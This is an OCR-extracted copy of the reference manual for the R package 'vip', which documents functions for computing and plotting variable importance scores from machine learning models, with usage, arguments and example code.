"__label__software_dev": 0.962890625, "__label__sports_fitness": 0.00032138824462890625, "__label__transportation": 0.0005145072937011719, "__label__travel": 0.0002036094665527344}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 68518, 0.04793]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 68518, 0.42178]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 68518, 0.91444]], "google_gemma-3-12b-it_contains_pii": [[0, 1924, false], [1924, 5951, null], [5951, 9568, null], [9568, 13802, null], [13802, 17823, null], [17823, 20066, null], [20066, 24405, null], [24405, 27760, null], [27760, 31349, null], [31349, 35613, null], [35613, 37379, null], [37379, 40519, null], [40519, 44768, null], [44768, 48119, null], [48119, 52123, null], [52123, 55973, null], [55973, 59743, null], [59743, 63206, null], [63206, 68518, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1924, true], [1924, 5951, null], [5951, 9568, null], [9568, 13802, null], [13802, 17823, null], [17823, 20066, null], [20066, 24405, null], [24405, 27760, null], [27760, 31349, null], [31349, 35613, null], [35613, 37379, null], [37379, 40519, null], [40519, 44768, null], [44768, 48119, null], [48119, 52123, null], [52123, 55973, null], [55973, 59743, null], [59743, 63206, null], [63206, 68518, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 68518, null]], "pdf_page_numbers": [[0, 1924, 1], [1924, 5951, 2], [5951, 9568, 3], [9568, 13802, 4], [13802, 17823, 5], [17823, 20066, 6], [20066, 24405, 7], [24405, 27760, 8], [27760, 31349, 9], [31349, 35613, 10], [35613, 37379, 11], [37379, 40519, 12], [40519, 44768, 13], [44768, 48119, 14], [48119, 52123, 15], [52123, 55973, 16], [55973, 59743, 17], [59743, 63206, 18], [63206, 68518, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 68518, 0.10757]]}
|
olmocr_science_pdfs
|
2024-12-11
|
2024-12-11
|
55d20e4565a5e3b840a51b3b0d2d7a03b4ccc52e
|
Package ‘vip’
October 12, 2022
**Type** Package
**Title** Variable Importance Plots
**Version** 0.3.2
**Description** A general framework for constructing variable importance plots from various types of machine learning models in R. Aside from some standard model-specific variable importance measures, this package also provides model-agnostic approaches that can be applied to any supervised learning algorithm. These include 1) an efficient permutation-based variable importance measure, 2) variable importance based on Shapley values (Strumbelj and Kononenko, 2014) <doi:10.1007/s10115-013-0679-x>, and 3) the variance-based approach described in Greenwell et al. (2018) <arXiv:1805.04755>. A variance-based method for quantifying the relative strength of interaction effects is also included (see the previous reference for details).
**License** GPL (>= 2)
**URL** https://github.com/koalaverse/vip/
**BugReports** https://github.com/koalaverse/vip/issues
**Encoding** UTF-8
**VignetteBuilder** knitr
**LazyData** true
**Imports** ggplot2 (>= 0.9.0), gridExtra, magrittr, plyr, stats, tibble, utils
**Suggests** DT, C50, caret, Ckmeans.1d.dp, covr, Cubist, doParallel, dplyr, earth, fastshap, gbm, glmmnet, h2o, htmlwidgets, keras, knitr, lattice, mlbench, mlr, mlr3, neuralnet, NeuralNetTools, nnet, parsnip, party, partykit, pdp, pls, randomForest, ranger, rmarkdown, rpart, RSNNS, sparkline, sparklyr (>= 0.8.0), tidytest, varImp, xgboost
**RoxygenNote** 7.1.1
**NeedsCompilation** no
**Author** Brandon Greenwell [aut, cre] (<https://orcid.org/0000-0002-8120-0084>), Brad Boehmke [aut] (<https://orcid.org/0000-0002-3611-8516>), Bernie Gray [aut] (<https://orcid.org/0000-0001-9190-6032>)}
**Description**
Create an HTML widget to display variable importance scores with a sparkline representation of each features effect (i.e., its partial dependence function).
**Usage**
```r
add_sparklines(object, fit, digits = 3, free_y = FALSE, verbose = FALSE, ...)
```
```r
# S3 method for class 'vi'
add_sparklines(object, fit, digits = 3, free_y = FALSE, verbose = FALSE, ...)
```
**Arguments**
- **object**: An object that inherits from class "vi".
- **fit**: The original fitted model. Only needed if `vi()` was not called with 'method = "firm"'.
- **digits**: Integer specifying the minimal number of significant digits to use for displaying importance scores and, if available, their standard deviations.
- **free_y**: Logical indicating whether or not the y-axis limits should be allowed to vary for each sparkline. Default is FALSE.
verbose Logical indicating whether or not to print progress. Default is FALSE.
... Additional optional arguments to be passed on to partial.
Value
An object of class c("datatables", "htmlwidget"); essentially, a data frame with three columns: Variable, Importance, and Effect (a sparkline representation of the partial dependence function). For "lm"/"glm"-like objects, an additional column, called Sign, is also included which includes the sign (i.e., POS/NEG) of the original coefficient.
References
Description
Simulate data from the Friedman 1 benchmark problem. See mlbench.friedman1 for details and references.
Usage
gen_friedman(
n_samples = 100,
n_features = 10,
n_bins = NULL,
sigma = 0.1,
seed = NULL)
Arguments
n_samples Integer specifying the number of samples (i.e., rows) to generate. Default is 100.
n_features Integer specifying the number of features to generate. Default is 10.
n_bins Integer specifying the number of (roughly) equal sized bins to split the response into. Default is NULL for no binning. Setting to a positive integer > 1 effectively turns this into a classification problem where n_bins gives the number of classes.
sigma Numeric specifying the standard deviation of the noise.
seed Integer specifying the random seed. If NULL (the default) the results will be different each time the function is run.
Note
This function is mostly used for internal testing.
Examples
gen_friedman()
get_formula Extract model formula
Description
Calls \texttt{formula} to extract the formulae from various modeling objects, but returns \texttt{NULL} instead of an error for objects that do not contain a formula component.
Usage
get_formula(object)
Arguments
\texttt{object} An appropriate fitted model object.
Value
Either a \texttt{formula} object or \texttt{NULL}.
list_metrics List metrics
Description
List all available performance metrics.
Usage
list_metrics()
Examples
\begin{verbatim}
(meters <- list_metrics())
meters[meters$Task == "Multiclass classification", ]
\end{verbatim}
**Description**
Common model/evaluation metrics for machine learning.
**Usage**
metric_mse(actual, predicted, na.rm = FALSE)
metric_rmse(actual, predicted, na.rm = FALSE)
metric_sse(actual, predicted, na.rm = FALSE)
metric_mae(actual, predicted, na.rm = FALSE)
metric_rsquared(actual, predicted, na.rm = FALSE)
metric_accuracy(actual, predicted, na.rm = FALSE)
metric_error(actual, predicted, na.rm = FALSE)
metric_auc(actual, predicted)
metric_logLoss(actual, predicted)
**Arguments**
- **actual**: Vector of actual target values.
- **predicted**: Vector of predicted target values.
- **na.rm**: Logical indicating whether or not NA values should be stripped before the computation proceeds.
**Note**
The metric_auc and metric_logLoss functions are based on code from the Metrics package.
**Examples**
```r
x <- rnorm(10)
y <- rnorm(10)
metric_mse(x, y)
metric_rsquared(x, y)
```
Variable importance
Compute variable importance scores for the predictors in a model.
Usage
vi(object, ...)
## Default S3 method:
vi(
object,
method = c("model", "firm", "permute", "shap"),
feature_names = NULL,
FUN = NULL,
var_fun = NULL,
ice = FALSE,
abbreviate_feature_names = NULL,
sort = TRUE,
decreasing = TRUE,
scale = FALSE,
rank = FALSE,
...
)
## S3 method for class 'model_fit'
vi(object, ...)
## S3 method for class 'WrappedModel'
vi(object, ...)
## S3 method for class 'Learner'
vi(object, ...)
Arguments
object A fitted model object (e.g., a "randomForest" object) or an object that inherits from class "vi".
... Additional optional arguments to be passed on to vi_model, vi_firm, vi_permute, or vi_shap.
method Character string specifying the type of variable importance (VI) to compute. Current options are "model" (the default), for model-specific VI scores (see vi_model for details), "firm", for variance-based VI scores (see vi_firm for...
details), "permute", for permutation-based VI scores (see `vi_permute` for details), or "shap", for Shapley-based VI scores. For more details on the variance-based methods, see Greenwell et al. (2018) and Scholbeck et al. (2019).
**feature_names**
Character string giving the names of the predictor variables (i.e., features) of interest.
**FUN**
Deprecated. Use `var_fun` instead.
**var_fun**
List with two components, "cat" and "con", containing the functions to use to quantify the variability of the feature effects (e.g., partial dependence values) for categorical and continuous features, respectively. If NULL, the standard deviation is used for continuous features. For categorical features, the range statistic is used (i.e., (max - min) / 4). Only applies when `method = "firm"`.
**ice**
Logical indicating whether or not to estimate feature effects using individual conditional expectation (ICE) curves. Only applies when `method = "firm"`. Default is FALSE. Setting ice = TRUE is preferred whenever strong interaction effects are potentially present.
**abbreviate_feature_names**
Integer specifying the length at which to abbreviate feature names. Default is NULL which results in no abbreviation (i.e., the full name of each feature will be printed).
**sort**
Logical indicating whether or not to order the sort the variable importance scores. Default is TRUE.
**decreasing**
Logical indicating whether or not the variable importance scores should be sorted in descending (TRUE) or ascending (FALSE) order of importance. Default is TRUE.
**scale**
Logical indicating whether or not to scale the variable importance scores so that the largest is 100. Default is FALSE.
**rank**
Logical indicating whether or not to rank the variable importance scores (i.e., convert to integer ranks). Default is FALSE. Potentially useful when comparing variable importance scores across different models using different methods.
**Value**
A tidy data frame (i.e., a "tibble" object) with at least two columns: Variable and Importance. For "lm"/"glm"-like objects, an additional column, called Sign, is also included which includes the sign (i.e., POS/NEG) of the original coefficient. If `method = "permute"` and `nsim > 1`, then an additional column, StDev, giving the standard deviation of the permutation-based variable importance scores is included.
**References**
**Examples**
```r
# A projection pursuit regression example
```
# Load the sample data
data(mtcars)
# Fit a projection pursuit regression model
mtcars.ppr <- ppr(mpg ~ ., data = mtcars, nterms = 1)
# Compute variable importance scores
vi(mtcars.ppr, method = "firm", ice = TRUE)
vi(mtcars.ppr, method = "firm", ice = TRUE,
var_fun = list("con" = mad, "cat" = function(x) diff(range(x)) / 4))
# Plot variable importance scores
vip(mtcars.ppr, method = "firm", ice = TRUE)
---
vint
## Interaction effects
### Description
Quantify the strength of two-way interaction effects using a simple *feature importance ranking measure* (FIRM) approach. For details, see Greenwell et al. (2018).
### Usage
```r
vint(
object, # A fitted model object (e.g., a "randomForest" object).
feature_names, # Character string giving the names of the two features of interest.
progress = "none", # Character string giving the name of the progress bar to use while constructing the interaction statistics. See create_progress_bar for details. Default is "none".
parallel = FALSE, # Logical indicating whether or not to run partial in parallel using a backend provided by the foreach package. Default is FALSE.
paropts = NULL, # List containing additional options to be passed on to foreach when parallel = TRUE.
... # Additional optional arguments to be passed on to partial.
)
```
### Arguments
- `object`: A fitted model object (e.g., a "randomForest" object).
- `feature_names`: Character string giving the names of the two features of interest.
- `progress`: Character string giving the name of the progress bar to use while constructing the interaction statistics. See `create_progress_bar` for details. Default is "none".
- `parallel`: Logical indicating whether or not to run `partial` in parallel using a backend provided by the `foreach` package. Default is `FALSE`.
- `paropts`: List containing additional options to be passed on to `foreach` when `parallel = TRUE`.
- `...`: Additional optional arguments to be passed on to `partial`.
Details
This function quantifies the strength of interaction between features $X_1$ and $X_2$ by measuring the change in variance along slices of the partial dependence of $X_1$ and $X_2$ on the target $Y$. See Greenwell et al. (2018) for details and examples.
References
Examples
```r
## Not run:
#
# The Friedman 1 benchmark problem
#
#
# Load required packages
library(gbm)
library(ggplot2)
library(mlbench)
# Simulate training data
trn <- gen_friedman(500, seed = 101) # vip::gen_friedman
# NOTE: The only interaction that actually occurs in the model from which
# these data are generated is between x.1 and x.2!
#
# Fit a GBM to the training data
set.seed(102) # for reproducibility
fit <- gbm(y ~ ., data = trn, distribution = "gaussian", n.trees = 1000,
interaction.depth = 2, shrinkage = 0.01, bag.fraction = 0.8,
cv.folds = 5)
best_iter <- gbm.perf(fit, plot.it = FALSE, method = "cv")
# Quantify relative interaction strength
all_pairs <- combn(paste0("x." , 1:10), m = 2)
res <- NULL
for (i in seq_along(all_pairs)) {
interact <- vint(fit, feature_names = all_pairs[, i], n.trees = best_iter)
res <- rbind(res, interact)
}
# Plot top 20 results
top_20 <- res[1:20,]
ggplot(top_20, aes(x = reorder(Variables, Interaction), y = Interaction)) +
geom_col() +
coord_flip() +
xlab("") +
ylab("Interaction strength")
```
## End(Not run)
### vip
#### Variable importance plots
**Description**
Plot variable importance scores for the predictors in a model.
**Usage**
`vip(object, ...)`
```
## Default S3 method:
vip(
object,
num_features = 10L,
geom = c("col", "point", "boxplot", "violin"),
mapping = NULL,
aesthetics = list(),
horizontal = TRUE,
all_permutations = FALSE,
jitter = FALSE,
include_type = FALSE,
...
)
```
```
## S3 method for class 'model_fit'
vip(object, ...)
```
**Arguments**
**object**
A fitted model object (e.g., a "randomForest" object) or an object that inherits from class "vi".
**...**
Additional optional arguments to be passed on to `vi`.
**num_features**
Integer specifying the number of variable importance scores to plot. Default is 10.
**geom**
Character string specifying which type of plot to construct. The currently available options are described below.
- `geom = "col"` uses `geom_col` to construct a bar chart of the variable importance scores.
- `geom = "point"` uses `geom_point` to construct a Cleveland dot plot of the variable importance scores.
geom = "boxplot" uses `geom_boxplot` to construct a boxplot plot of the variable importance scores. This option can only for the permutation-based importance method with `nsim > 1` and `keep = TRUE`; see `vi_permute` for details.
geom = "violin" uses `geom_violin` to construct a violin plot of the variable importance scores. This option can only for the permutation-based importance method with `nsim > 1` and `keep = TRUE`; see `vi_permute` for details.
**Examples**
```r
# A projection pursuit regression example
#
# Load the sample data
data(mtcars)
# Fit a projection pursuit regression model
model <- ppr(mpg ~ ., data = mtcars, nterms = 1)
# Construct variable importance plot
vip(model, method = "firm")
# Better yet, store the variable importance scores and then plot
vi_scores <- vi(model, method = "firm")
vip(vi_scores, geom = "point", horiz = FALSE)
# The `%T>%` operator is imported for convenience; see ?magrittr::%T>%
# for details
vi_scores <- model %>%
vi(method = "firm") %>%
print(vip(.))
vi_scores
```
vi_firm
Variance-based variable importance
Description
Compute variance-based variable importance using a simple feature importance ranking measure (FIRM) approach; for details, see Greenwell et al. (2018) and Scholbeck et al. (2019).
Usage
vi_firm(object, ...)
## Default S3 method:
vi_firm(object, feature_names, FUN = NULL, var_fun = NULL, ice = FALSE, ...)
Arguments
object A fitted model object (e.g., a "randomForest" object).
... Additional optional arguments to be passed on to partial.
feature_names Character string giving the names of the predictor variables (i.e., features) of interest.
FUN Deprecated. Use var_fun instead.
var_fun List with two components, "cat" and "con", containing the functions to use to quantify the variability of the feature effects (e.g., partial dependence values) for categorical and continuous features, respectively. If NULL, the standard deviation is used for continuous features. For categorical features, the range statistic is used (i.e., (max - min) / 4). Only applies when method = "firm".
ice Logical indicating whether or not to estimate feature effects using individual conditional expectation (ICE) curves. Only applies when method = "firm". Default is FALSE. Setting ice = TRUE is preferred whenever strong interaction effects are potentially present.
vi_model
Details
This approach to computing VI scores is based on quantifying the relative "flatness" of the effect of each feature. Feature effects can be assessed using partial dependence plots (PDPs) or individual conditional expectation (ICE) curves. These approaches are model-agnostic and can be applied to any supervised learning algorithm. By default, relative "flatness" is defined by computing the standard deviation of the y-axis values for each feature effect plot for numeric features; for categorical features, the default is to use range divided by 4. This can be changed via the `var_fun` argument. See Greenwell et al. (2018) for details and additional examples.
Value
A tidy data frame (i.e., a "tibble" object) with two columns, Variable and Importance, containing the variable name and its associated importance score, respectively.
References
---
vi_model
Model-specific variable importance
Description
Compute model-specific variable importance scores for the predictors in a model.
Usage
```r
vi_model(object, ...)
## Default S3 method:
vi_model(object, ...)
## S3 method for class 'C5.0'
vi_model(object, type = c("usage", "splits"), ...)
## S3 method for class 'train'
vi_model(object, ...)
## S3 method for class 'cubist'
vi_model(object, ...)
## S3 method for class 'earth'
```
vi_model(object, type = c("nsubsets", "rss", "gcv"), ...)
## S3 method for class 'gbm'
vi_model(object, type = c("relative.influence", "permutation"), ...)
## S3 method for class 'glmnet'
vi_model(object, lambda = NULL, ...)
## S3 method for class 'cv.glmnet'
vi_model(object, lambda = NULL, ...)
## S3 method for class 'H2OBinomialModel'
vi_model(object, ...)
## S3 method for class 'H2OMultinomialModel'
vi_model(object, ...)
## S3 method for class 'H2ORegressionModel'
vi_model(object, ...)
## S3 method for class 'WrappedModel'
vi_model(object, ...)
## S3 method for class 'Learner'
vi_model(object, ...)
## S3 method for class 'nn'
vi_model(object, type = c("olden", "garson"), ...)
## S3 method for class 'nnet'
vi_model(object, type = c("olden", "garson"), ...)
## S3 method for class 'model_fit'
vi_model(object, ...)
## S3 method for class 'RandomForest'
vi_model(object, type = c("accuracy", "auc"), ...)
## S3 method for class 'constparty'
vi_model(object, ...)
## S3 method for class 'cforest'
vi_model(object, ...)
## S3 method for class 'mvr'
vi_model(object, ...)
## S3 method for class 'randomForest'
vi_model
vi_model(object, ...)
## S3 method for class 'ranger'
vi_model(object, ...)
## S3 method for class 'rpart'
vi_model(object, ...)
## S3 method for class 'mlp'
vi_model(object, type = c("olden", "garson"), ...)
## S3 method for class 'ml_model_decision_tree_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_decision_tree_classification'
vi_model(object, ...)
## S3 method for class 'ml_model_gbt_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_gbt_classification'
vi_model(object, ...)
## S3 method for class 'ml_model_generalized_linear_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_linear_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_random_forest_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_random_forest_classification'
vi_model(object, ...)
## S3 method for class 'lm'
vi_model(object, type = c("stat", "raw"), ...)
## S3 method for class 'xgb.Booster'
vi_model(object, type = c("gain", "cover", "frequency"), ...)
Arguments
- **object**: A fitted model object (e.g., a "randomForest" object).
- **...**: Additional optional arguments to be passed on to other methods.
- **type**: Character string specifying the type of variable importance to return (only used for some models). See details for which methods this argument applies to.
- **lambda**: Numeric value for the penalty parameter of a glmnet model (this is equivalent
to the s argument in \texttt{coef.glmnet}). See the section on \texttt{glmnet} in the details below.
**Details**
Computes model-specific variable importance scores depending on the class of \texttt{object}:
**C5.0** Variable importance is measured by determining the percentage of training set samples that fall into all the terminal nodes after the split. For example, the predictor in the first split automatically has an importance measurement of 100 percent since all samples are affected by this split. Other predictors may be used frequently in splits, but if the terminal nodes cover only a handful of training set samples, the importance scores may be close to zero. The same strategy is applied to rule-based models and boosted versions of the model. The underlying function can also return the number of times each predictor was involved in a split by using the option \texttt{metric = "usage"}. See \texttt{C5imp} for details.
**cubist** The Cubist output contains variable usage statistics. It gives the percentage of times where each variable was used in a condition and/or a linear model. Note that this output will probably be inconsistent with the rules shown in the output from \texttt{summary.cubist}. At each split of the tree, Cubist saves a linear model (after feature selection) that is allowed to have terms for each variable used in the current split or any split above it. Quinlan (1992) discusses a smoothing algorithm where each model prediction is a linear combination of the parent and child model along the tree. As such, the final prediction is a function of all the linear models from the initial node to the terminal node. The percentages shown in the Cubist output reflects all the models involved in prediction (as opposed to the terminal models shown in the output). The variable importance used here is a linear combination of the usage in the rule conditions and the model. See \texttt{summary.cubist} and \texttt{varImp.cubist} for details.
**glmnet** Similar to (generalized) linear models, the absolute value of the coefficients are returned for a specific model. It is important that the features (and hence, the estimated coefficients) be standardized prior to fitting the model. You can specify which coefficients to return by passing the specific value of the penalty parameter via the \texttt{lambda} argument (this is equivalent to the \texttt{s} argument in \texttt{coef.glmnet}). By default, \texttt{lambda} = \texttt{NULL} and the coefficients corresponding to the final penalty value in the sequence are returned; in other words, you should ALWAYS SPECIFY \texttt{lambda}! For \texttt{"cv.glmnet"} objects, the largest value of \texttt{lambda} such that the error is within one standard error of the minimum is used by default. For \texttt{"multnet"} objects, the coefficients corresponding to the first class are used; that is, the first component of \texttt{coef.glmnet}.
**cforest** Variable importance is measured in a way similar to those computed by \texttt{importance}. Besides the standard version, a conditional version is available that adjusts for correlations between predictor variables. If \texttt{conditional = TRUE}, the importance of each variable is computed by permuting within a grid defined by the predictors that are associated (with 1 - \texttt{p}-value greater than threshold) to the variable of interest. The resulting variable importance score is conditional in the sense of beta coefficients in regression models, but represents the effect of a variable in both main effects and interactions. See Strobl et al. (2008) for details. Note, however, that all random forest results are subject to random variation. Thus, before interpreting the importance ranking, check whether the same ranking is achieved with a different random seed - or otherwise increase the number of trees \texttt{ntree} in \texttt{ctree_control}. Note that in the presence of missings in the predictor variables the procedure described in Hapfelmeier et al. (2012) is performed. See \texttt{varimp} for details.
earth The `earth` package uses three criteria for estimating the variable importance in a MARS model (see `evimp` for details):
- The `nsubsets` criterion (`type = "nsubsets"`) counts the number of model subsets that include each feature. Variables that are included in more subsets are considered more important. This is the criterion used by `summary.earth` to print variable importance. By "subsets" we mean the subsets of terms generated by `earth()`’s backward pass. There is one subset for each model size (from one to the size of the selected model) and the subset is the best set of terms for that model size. (These subsets are specified in the `$prune.terms` component of `earth()`’s return value.) Only subsets that are smaller than or equal in size to the final model are used for estimating variable importance. This is the default method used by `vip`.
- The `rss` criterion (`type = "rss"`) first calculates the decrease in the RSS for each subset relative to the previous subset during `earth()`’s backward pass. (For multiple response models, RSS’s are calculated over all responses.) Then for each variable it sums these decreases over all subsets that include the variable. Finally, for ease of interpretation the summed decreases are scaled so the largest summed decrease is 100. Variables which cause larger net decreases in the RSS are considered more important.
- The `gcv` criterion (`type = "gcv"`) is similar to the `rss` approach, but uses the GCV statistic instead of the RSS. Note that adding a variable can sometimes increase the GCV. (Adding the variable has a deleterious effect on the model, as measured in terms of its estimated predictive power on unseen data.) If that happens often enough, the variable can have a negative total importance, and thus appear less important than unused variables.
gbm Variable importance is computed using one of two approaches (See `summary.gbm` for details):
- The standard approach (`type = "relative.influence"`) described in Friedman (2001). When `distribution = "gaussian"` this returns the reduction of squared error attributable to each variable. For other loss functions this returns the reduction attributable to each variable in sum of squared error in predicting the gradient on each iteration. It describes the relative influence of each variable in reducing the loss function. This is the default method used by `vip`.
- An experimental permutation-based approach (`type = "permutation"`). This method randomly permutes each predictor variable at a time and computes the associated reduction in predictive performance. This is similar to the variable importance measures Leo Breiman uses for random forests, but `gbm` currently computes using the entire training dataset (not the out-of-bag observations).
H2OModel See `h2o.varimp` or visit [http://docs.h2o.ai/h2o/latest-stable/h2o-docs/variable-importance.html](http://docs.h2o.ai/h2o/latest-stable/h2o-docs/variable-importance.html) for details.
nnet Two popular methods for constructing variable importance scores with neural networks are the Garson algorithm (Garson 1991), later modified by Goh (1995), and the Olden algorithm (Olden et al. 2004). For both algorithms, the basis of these importance scores is the network’s connection weights. The Garson algorithm determines variable importance by identifying all weighted connections between the nodes of interest. Olden’s algorithm, on the other hand, uses the product of the raw connection weights between each input and output neuron and sums the product across all hidden neurons. This has been shown to outperform the Garson method in various simulations. For DNNs, a similar method due to Gedeon (1997) considers the weights connecting the input features to the first two hidden layers (for simplicity and speed); but this method can be slow for large networks. To implement the Olden and Garson
algorithms, use type = "olden" and type = "garson", respectively. See garson and olden for details.
lm In (generalized) linear models, variable importance is typically based on the absolute value of the corresponding \( t \)-statistics. For such models, the sign of the original coefficient is also returned. By default, type = "stat" is used; however, if the inputs have been appropriately standardized then the raw coefficients can be used with type = "raw".
ml.feature.importances The Spark ML library provides standard variable importance for tree-based methods (e.g., random forests). See ml.feature.importances for details.
randomForest Random forests typically provide two measures of variable importance. The first measure is computed from permuting out-of-bag (OOB) data: for each tree, the prediction error on the OOB portion of the data is recorded (error rate for classification and MSE for regression). Then the same is done after permuting each predictor variable. The difference between the two are then averaged over all trees in the forest, and normalized by the standard deviation of the differences. If the standard deviation of the differences is equal to 0 for a variable, the division is not done (but the average is almost always equal to 0 in that case). See importance for details, including additional arguments that can be passed via the ... argument.
The second measure is the total decrease in node impurities from splitting on the variable, averaged over all trees. For classification, the node impurity is measured by the Gini index. For regression, it is measured by residual sum of squares. See importance for details.
cforest Same approach described in cforest above. See varimp and varimpAUC (if type = "auc") for details.
ranger Variable importance for ranger objects is computed in the usual way for random forests. The approach used depends on the importance argument provided in the initial call to ranger. See importance for details.
rpart As stated in one of the rpart vignettes. A variable may appear in the tree many times, either as a primary or a surrogate variable. An overall measure of variable importance is the sum of the goodness of split measures for each split for which it was the primary variable, plus "goodness" * (adjusted agreement) for all splits in which it was a surrogate. Imagine two variables which were essentially duplicates of each other; if we did not count surrogates, they would split the importance with neither showing up as strongly as it should. See rpart for details.
train Various model-specific and model-agnostic approaches that depend on the learning algorithm employed in the original call to train. See varImp for details.
xgboost For linear models, the variable importance is the absolute magnitude of the estimated coefficients. For that reason, in order to obtain a meaningful ranking by importance for a linear model, the features need to be on the same scale (which you also would want to do when using either L1 or L2 regularization). Otherwise, the approach described in Friedman (2001) for gbms is used. See xgb.importance for details. For tree models, you can obtain three different types of variable importance:
- Using type = "gain" (the default) gives the fractional contribution of each feature to the model based on the total gain of the corresponding feature's splits.
- Using type = "cover" gives the number of observations related to each feature.
- Using type = "frequency" gives the percentages representing the relative number of times each feature has been used throughout each tree in the ensemble.
Value
A tidy data frame (i.e., a "tibble" object) with two columns: Variable and Importance. For "lm"/"glm"-like object, an additional column, called Sign, is also included which includes the sign (i.e., POS/NEG) of the original coefficient.
Note
Inspired by the varImp function.
---
### vi_pdp
**Description**
These functions have been deprecated and should not be used. They will be removed in the next release.
**Usage**
```r
vi_pdp(...)
vi_ice(...)
```
**Arguments**
```r
...
Arguments passed on to `vi_firm`.
```
---
### vi_permute
**Description**
Compute permutation-based variable importance scores for the predictors in a model.
**Usage**
```r
vi_permute(object, ...)
```
## Default S3 method:
```r
vi_permute(
object,
feature_names = NULL,
train = NULL,
target = NULL,
metric = NULL,
)
```
smaller_is_better = NULL,
type = c("difference", "ratio"),
nsim = 1,
keep = TRUE,
sample_size = NULL,
sample_frac = NULL,
reference_class = NULL,
pred_fun = NULL,
pred_wrapper = NULL,
verbose = FALSE,
progress = "none",
parallel = FALSE,
paropts = NULL,
...)
Arguments
object A fitted model object (e.g., a "randomForest" object).
... Additional optional arguments. (Currently ignored.)
feature_names Character string giving the names of the predictor variables (i.e., features) of interest. If NULL (the default) then the internal ‘get_feature_names()’ function will be called to try and extract them automatically. It is good practice to always specify this argument.
train A matrix-like R object (e.g., a data frame or matrix) containing the training data. If NULL (the default) then the internal ‘get_training_data()’ function will be called to try and extract it automatically. It is good practice to always specify this argument.
target Either a character string giving the name (or position) of the target column in train or, if train only contains feature columns, a vector containing the target values used to train object.
metric Either a function or character string specifying the performance metric to use in computing model performance (e.g., RMSE for regression or accuracy for binary classification). If metric is a function, then it requires two arguments, actual and predicted, and should return a single, numeric value. Ideally, this should be the same metric that was used to train object. See list_metrics for a list of built-in metrics.
smaller_is_better Logical indicating whether or not a smaller value of metric is better. Default is NULL. Must be supplied if metric is a user-supplied function.
type Character string specifying how to compare the baseline and permuted performance metrics. Current options are "difference" (the default) and "ratio".
nsim Integer specifying the number of Monte Carlo replications to perform. Default is 1. If nsim > 1, the results from each replication are simply averaged together (the standard deviation will also be returned).
keep Logical indicating whether or not to keep the individual permutation scores for all nsim repetitions. If TRUE (the default) then the individual variable importance
scores will be stored in an attribute called "raw_scores". (Only used when nsim > 1.)
**sample_size**
Integer specifying the size of the random sample to use for each Monte Carlo repetition. Default is NULL (i.e., use all of the available training data). Cannot be specified with sample_frac. Can be used to reduce computation time with large data sets.
**sample_frac**
Proportion specifying the size of the random sample to use for each Monte Carlo repetition. Default is NULL (i.e., use all of the available training data). Cannot be specified with sample_size. Can be used to reduce computation time with large data sets.
**reference_class**
Character string specifying which response category represents the "reference" class (i.e., the class for which the predicted class probabilities correspond to). Only needed for binary classification problems.
**pred_fun**
Deprecated. Use pred_wrapper instead.
**pred_wrapper**
Prediction function that requires two arguments, object and newdata. The output of this function should be determined by the metric being used:
- **Regression** A numeric vector of predicted outcomes.
- **Binary classification** A vector of predicted class labels (e.g., if using misclassification error) or a vector of predicted class probabilities for the reference class (e.g., if using log loss or AUC).
- **Multiclass classification** A vector of predicted class labels (e.g., if using misclassification error) or a matrix/data frame of predicted class probabilities for each class (e.g., if using log loss or AUC).
**verbose**
Logical indicating whether or not to print information during the construction of variable importance scores. Default is FALSE.
**progress**
Character string giving the name of the progress bar to use. See `create_progress_bar` for details. Default is "none".
**parallel**
Logical indicating whether or not to run `vi_permute()` in parallel (using a backend provided by the foreach package). Default is FALSE. If TRUE, an appropriate backend must be provided by foreach.
**paropts**
List containing additional options to be passed on to foreach when parallel = TRUE.
**Details**
Coming soon!
**Value**
A tidy data frame (i.e., a "tibble" object) with two columns: Variable and Importance.
**Examples**
```r
## Not run:
# Load required packages
```
library(ggplot2) # for ggtitle() function
library(nnet) # for fitting neural networks
# Simulate training data
trn <- gen_friedman(500, seed = 101) # ?vip::gen_friedman
# Inspect data
tibble::as_tibble(trn)
# Fit PPR and NN models (hyperparameters were chosen using the caret package
# with 5 repeats of 5-fold cross-validation)
pp <- ppr(y ~ ., data = trn, nterms = 11)
set.seed(0803) # for reproducibility
nn <- nnet(y ~ ., data = trn, size = 7, decay = 0.1, linout = TRUE,
maxit = 500)
# Plot VI scores
set.seed(2021) # for reproducibility
p1 <- vip(pp, method = "permute", target = "y", metric = "rsquared",
pred_wrapper = predict) + ggtitle("PPR")
p2 <- vip(nn, method = "permute", target = "y", metric = "rsquared",
pred_wrapper = predict) + ggtitle("NN")
ggrid.arrange(p1, p2, ncol = 2)
# Mean absolute error
mae <- function(actual, predicted) {
mean(abs(actual - predicted))
}
# Permutation-based VIP with user-defined MAE metric
set.seed(1101) # for reproducibility
vip(pp, method = "permute", target = "y", metric = mae,
smaller_is_better = TRUE,
pred_wrapper = function(object, newdata) predict(object, newdata)
) + ggtitle("PPR")
## End(Not run)
---
**vi_shap**
**SHAP-based variable importance**
---
**Description**
